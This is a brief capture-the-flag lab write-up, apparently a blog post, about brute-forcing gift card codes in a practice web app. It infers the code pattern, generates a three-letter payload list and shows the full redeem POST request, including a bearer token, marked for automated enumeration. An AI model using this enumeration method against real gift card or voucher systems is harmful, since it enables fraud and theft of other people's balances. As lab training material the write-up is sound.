Brute force. Can you redeem gift vouchers that don't belong to you?
After loading up the lab, go ahead and register an account. Navigating to the gift card page I started examining the setup for the gift card redemption, and it looked like "CAFE-XXXX-XXXX-XXXX" - in my head I started thinking this brute force might take a while. So instead of firing up a random brute force attempt I decided to purchase a couple of gift cards and I noticed that they all had the same format.
CAFE-0903-AJPX
CAFE-0903-ANPI
CAFE-0903-AQPS
We can assume the format is going to be "CAFE-0903-AXXX", so this drops our options significantly. I fired up Burp Suite and started Intruder to brute force the gift card codes - but I realized very quickly that this was going to take ages (since I don't have a professional license). Instead I had my good pal Claude make me some Python code that would generate payloads based on whatever parameters I needed, in this cause it would "AAA-ZZZ". I then switched over to Caido and tossed the request into Automate, I loaded my generated payload file and started firing away.
POST /api/giftcards/redeem HTTP/1.1
Host: lab-1773063210289-04w2oo.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NSwidXNlcm5hbWUiOiJ0ZXN0XzEiLCJpYXQiOjE3NzMwNjMyNTh9.-M8wHLlqBZu-gUYuFrLeuEW_INAOhdyzbz9MAhQzPjk
Content-Length: 25
Origin: https://lab-1773063210289-04w2oo.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1773063210289-04w2oo.labs-app.bugforge.io/giftcards
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
{"code":"CAFE-0903-A$QPS$"}
Give it a few minutes and you may just find you self a valid code and maybe even a flag!
No AI used in the making of this post that I know of atleast 😀